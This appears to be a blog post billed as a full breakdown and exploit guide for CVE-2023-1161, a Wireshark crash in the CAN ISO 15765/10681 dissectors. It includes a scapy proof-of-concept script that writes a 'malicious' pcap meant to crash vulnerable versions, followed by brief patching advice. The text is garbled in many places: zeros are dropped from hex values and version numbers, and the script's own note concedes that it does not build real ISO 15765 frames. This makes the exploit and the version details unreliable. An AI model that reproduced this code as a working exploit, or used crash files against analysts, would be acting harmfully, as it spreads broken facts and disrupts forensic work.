CVE-2023-1161 - How ISO 15765 & ISO 10681 Packet Crashes Wireshark – Full Breakdown & Exploit Guide

Wireshark is the world’s go-to tool for network protocol analysis, trusted by countless security pros and network admins. But even the best tools have bugs. In 2023, researchers uncovered a nasty vulnerability—CVE-2023-1161—that lets bad actors crash Wireshark remotely using specially crafted CAN packets. This post breaks it down in clear English, shows how to trigger the bug, and covers everything you need to know.

TL;DR

Vulnerability: Bad packets targeting the CAN ISO 15765 or ISO 10681 dissectors crash Wireshark.
Wireshark versions affected:

3.6. to 3.6.11

Impact: Denial of service (DoS) – Wireshark closes or crashes.
Trigger: Malicious live traffic or capture file (*.pcap)
Fixed in: Wireshark 4..4 and 3.6.12+

1. What’s Happening? (The Human Version)

Wireshark can dissect traffic from hundreds of protocols. Among them are automotive CAN protocols—ISO 15765 and ISO 10681—used in car networks. The dissectors are the pieces of Wireshark that decode these protocols so you can analyze the traffic.
If Wireshark meets a certain crafted CAN packet, it gets confused, does some invalid memory access or logic error, and crashes. Attackers can either inject packets into your capture, or just give you a booby-trapped .pcap file to analyze.

Official Advisory Excerpt

> Multiple dissector crashes. Wireshark could crash when dissecting crafted ISO 15765 and ISO 10681 packets.
> – Wireshark Security Advisory wnpa-sec-2023-07

2. Why Does It Matter?

- If an attacker can send you files or live traffic to Wireshark (common for automotive security folks), they can kill your analysis in seconds.

Crash = you lose your progress and maybe, if you’re unlucky, a saved capture.

- It’s a classic denial of service—and could be used by malware to zap forensics investigations.

3. The Technical Root (Simple Terms)

The bug is deep in the CAN ISO 15765 and ISO 10681 protocol dissectors. If you feed it a packet with the right (wrong!) combination of values, Wireshark will try to do something impossible (think buffer overflow or dereference a NULL pointer) and die.

*Example scenario*:

4.1. Build a Malicious Packet

Here’s Python code (using scapy) that crafts a packet for CAN ISO 15765, dumps it to a .pcap, and triggers the crash on vulnerable Wireshark versions:

from scapy.all import *

# Construct intentionally malformed CAN ISO15765 packet
malicious_frame = CAN(id=x123, data=[xFF] * 100)  # Exaggerated data length to confuse the dissector

# Save the packet to pcap file
wrpcap("malicious_can.pcap", [malicious_frame])

print("Malicious CAN pcap written as 'malicious_can.pcap'. Open it in Wireshark 4..-4..3 or 3.6.-3.6.11 to trigger crash.")

Note:
- scapy CAN packets will not create fully authentic ISO 15765 frames, but this can be enough for crash testing if you adjust fields for edge cases.

5. Defensive Guide

How to protect yourself:
- Upgrade Wireshark. The bug is fixed in 4..4 and 3.6.12+ (Release Notes).
- Never analyze untrusted .pcap/.pcapng files on your main machine.

6. References

- Wireshark Security Advisory wnpa-sec-2023-07
- CVE-2023-1161, NVD record
- Wireshark Release Notes 4..4 (fix)
- Scapy documentation

7. Final Words

Protocol dissectors are tricky code; even strong projects like Wireshark can get caught out by edge cases, especially with rarely encountered automotive packets. Don’t wait—update Wireshark and be careful with files from outside sources.

If you’re working in automotive security or forensics, always keep your toolkit patched. And remember: sometimes, all it takes is a single packet to bring your tools down.

Timeline

Published on: 03/06/2023 21:15:00 UTC
Last modified on: 03/21/2023 16:21:00 UTC